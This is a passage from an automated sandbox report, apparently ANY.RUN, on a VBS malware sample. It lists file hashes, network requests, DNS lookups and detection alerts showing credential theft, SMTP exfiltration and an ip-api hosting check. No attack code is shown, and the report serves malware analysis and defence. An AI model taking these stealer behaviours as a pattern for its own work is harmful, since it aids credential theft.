MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5672wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2Dbinary
MD5:F2B6A4BEBF5E9F4DBD46D3A5CA1CF395
SHA256:605DA6BEAF229D3D1BED31B726706A151FCD44C6A9EA8817E46874294F877764
1068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_muibtvx4.lvd.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5672wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277Dder
MD5:07D62BA8CD29FBF8A6F1E4201594CE29
SHA256:24398D01735E1A2C5AEC70AB2CC64D5DC8C87D495EBFC055524BC237DEE32834
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
38
DNS requests
21
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3996
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
1528
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D
unknown
313 b
unknown
4480
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
unknown
binary
471 b
unknown
6592
SIHClient.exe
GET
200
2.17.245.133:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
binary
409 b
unknown
5672
wab.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
binary
1.41 Kb
unknown
5672
wab.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCRd4hKrA6aBAnnS3UYBsso
unknown
binary
472 b
unknown
5672
wab.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
unknown
binary
724 b
unknown
5672
wab.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCECzpBwEAqmZNCdn%2B9lFcFjc%3D
unknown
binary
471 b
unknown
5672
wab.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
text
6 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4828
svchost.exe
239.255.255.250:1900
unknown
6140
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3996
svchost.exe
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1280
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3996
svchost.exe
40.126.31.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3996
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
6544
svchost.exe
216.58.212.142:443
drive.google.com
GOOGLE
US
whitelisted
6544
svchost.exe
142.250.186.129:443
drive.usercontent.google.com
GOOGLE
US
whitelisted
3996
svchost.exe
40.126.31.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1528
backgroundTaskHost.exe
88.221.92.190:443
www.bing.com
Akamai International B.V.
NL
unknown

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.31.71
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.2
  • 20.190.159.68
  • 40.126.31.67
  • 20.190.159.71
  • 40.126.31.73
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
drive.google.com
  • 216.58.212.142
shared
drive.usercontent.google.com
  • 142.250.186.129
unknown
www.bing.com
  • 88.221.92.190
  • 88.221.92.189
  • 88.221.92.134
  • 88.221.92.193
  • 88.221.92.132
  • 88.221.92.137
  • 88.221.92.136
  • 88.221.92.191
  • 88.221.92.192
whitelisted
arc.msn.com
  • 20.103.156.88
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 2.17.245.133
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
5672
wab.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
5672
wab.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
5672
wab.exe
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
5672
wab.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Attempt to exfiltrate via SMTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs